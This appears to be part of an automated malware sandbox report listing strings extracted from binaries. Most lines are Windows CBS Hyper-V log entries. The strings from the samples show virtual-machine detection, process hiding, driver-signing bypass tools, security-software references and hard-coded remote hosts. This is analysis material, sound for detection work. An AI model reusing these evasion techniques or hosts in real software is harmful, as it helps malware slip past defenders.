        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Management-Clients, Intended State: Staged
        Source: csrss.exeBinary or memory string: main.isRunningInsideVMWare
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Onecore-SPP-VirtualDevice, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 268bf92397d59ed4327a8ab865bfc689, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: csrss.exeBinary or memory string: uetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm
        Source: csrss.exeBinary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: HyperV-Networking-Containers-Package, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7a9c36033f0c22829893bc1c0a5e07a8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Tools-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: fc0d60ecae9730160d4af9bb0ca3213e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detect Parent, Package: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Parent: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Disposition = Detect, VersionComp: EQ, BuildComp: EQ, RevisionComp: EQ, Exist: present
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1505902669a359dad80a977529ca66cd, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8381c0f3cdb917a83d773f922f3b5250 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7af75ecf5d4e3ae499f64704cca67740, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: c2f20508edf3c1fbda6e99ff59eb02d8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: l}main.isRunningInsideVMWare
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, new state: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 976eb15fe43109e4df4c51c7509e8caf, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8c028159d1d14a93f99d8c89b6f63e99 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 4584754bbb113844563ccba331941b2b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Onecore-SPP-VirtualDevice, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
        Source: csrss.exeBinary or memory string: ridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWin
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: upd.exe.0.drBinary or memory string: VMSrvc
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Installed, pending: Default, start: Installed, applicable: Installed, targeted: Installed, limit: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 0b74307a9b8d5a99fef4ac35da0bd75f, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsmb start: %wsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 3e4a15565a769f217408d9c4b1007394, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 4584754bbb113844563ccba331941b2b because it is already in the correct state.
        Source: 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmpBinary or memory string: vmnet/http.(*http2clientConnPool).addConnLocked
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: c299ced9de977b3f430798798b7f4515, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-63, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 459e5e70c44eb8fcb9d7b4b143aad831, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 71529a01421a29d3f726bde298b145c0 because it is already in the correct state.
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp | Binary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2679350ec0edae52ee03c1daaf55d8c2 because it is already in the correct state.
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp | Binary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Services, Intended State: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:57, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exe | Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 80db53a4564878a8cdff9a7ca652d3fe, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp | Binary or memory string: ><'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
        Source: csrss.exe | Binary or memory string: emoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Val
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8812e937fcebe77983df86ffdfe7a471, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
        Source: CBS.log.7.dr | Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detectParent (exact match): Parent: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, parent state: Installed
